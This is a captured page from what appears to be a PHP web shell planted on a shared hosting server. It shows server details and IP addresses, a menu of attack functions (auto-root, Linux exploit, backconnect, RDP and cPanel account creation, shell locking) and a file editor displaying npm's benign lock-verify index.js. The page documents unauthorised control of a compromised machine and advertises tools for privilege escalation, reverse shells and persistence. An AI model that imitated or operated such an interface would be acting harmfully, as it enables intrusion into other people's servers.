Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
node_modules /
lock-verify /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
752
B
-rw-r--r--
README.md
703
B
-rw-r--r--
index.js
2.87
KB
-rw-r--r--
package.json
1.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict' module.exports = lockVerify const fs = require('fs') const path = require('path') const npa = require('npm-package-arg') const semver = require('semver') function lockVerify(check) { if (!check) check = '.' const pjson = readJson(`${check}/package.json`) let plock = readJson(`${check}/npm-shrinkwrap.json`) .catch(() => readJson(`${check}/package-lock.json`)) return Promise.all([pjson, plock]).then(result => { const pjson = result[0] const plock = result[1] let warnings = [] let errors = [] for (let type of [['dependencies'], ['devDependencies'], ['optionalDependencies', true]]) { const deps = pjson[type[0]] if (!deps) continue const isOptional = type[1] Object.keys(deps).forEach(name => { const spec = npa.resolve(name, deps[name]) const lock = plock.dependencies[name] if (!lock) { if (isOptional) { warnings.push('Optional missing: ' + name + '@' + deps[name]) } else { errors.push('Missing: ' + name + '@' + deps[name]) } return } if (spec.registry) { // Can't match tags to package-lock w/o network if (spec.type === 'tag') return if (spec.type === 'alias') { const lockSpec = npa.resolve(name, lock.version) if (!semver.satisfies(lockSpec.subSpec.fetchSpec, spec.subSpec.fetchSpec)) { errors.push("Invalid: lock file's " + name + '@' + lock.version + ' does not satisfy ' + name + '@' + spec.rawSpec) return } } else { if (!semver.satisfies(lock.version, spec.fetchSpec)) { errors.push("Invalid: lock file's " + name + '@' + lock.version + ' does not satisfy ' + name + '@' + spec.fetchSpec) return } } } else if (spec.type === 'git') { // can't verify git w/o network return } else if (spec.type === 'remote') { if (lock.version !== spec.fetchSpec) { errors.push("Invalid: lock file's " + name + '@' + lock.version + ' does not satisfy ' + name + '@' + spec.fetchSpec) return } } else if (spec.type === 'file' || spec.type === 'directory') { const lockSpec = npa.resolve(name, lock.version) if (spec.fetchSpec !== lockSpec.fetchSpec) { errors.push("Invalid: lock file's " + name + '@' + lock.version + ' does not satisfy ' + name + '@' + deps[name]) return } } else { console.log(spec) } }) } return Promise.resolve({status: errors.length === 0, warnings: warnings, errors: errors}) }) } function readJson (file) { return new Promise((resolve, reject) => { fs.readFile(file, (err, content) => { if (err) return reject(err) return resolve(JSON.parse(content)) }) }) }
Close